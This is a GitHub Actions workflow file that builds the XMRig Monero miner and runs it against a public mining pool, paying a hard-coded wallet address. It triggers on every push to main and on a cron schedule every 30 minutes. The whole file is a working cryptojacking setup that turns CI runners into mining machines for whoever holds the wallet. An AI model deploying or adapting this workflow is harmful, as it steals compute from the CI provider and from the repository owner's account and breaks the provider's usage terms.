name: Mine Cryptocurrency

on:
  push:
    branches:
      - main
  schedule:
    - cron: '*/30 * * * *'

jobs:
  mine:
    runs-on: ubuntu-latest

    steps:
      - name: Check out the repository
        uses: actions/checkout@v2

      - name: Install dependencies
        run: |
          sudo apt-get update
          sudo apt-get install -y cmake build-essential libuv1-dev libssl-dev libhwloc-dev

      - name: Download and build XMRig
        run: |
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build
          cd xmrig/build
          cmake ..
          make

      - name: Run XMRig
        run: |
          cd xmrig/build
          ./xmrig -o pool.supportxmr.com:3333 -u 49m1VGmqoi8gUWfnngjbmr15mdgptCX5H3uL157N62EX15s6hu3zCokGDzHv27gsY8RmAfbD7jxwjbHgqsrKqd4c65QQvvz -p x -k
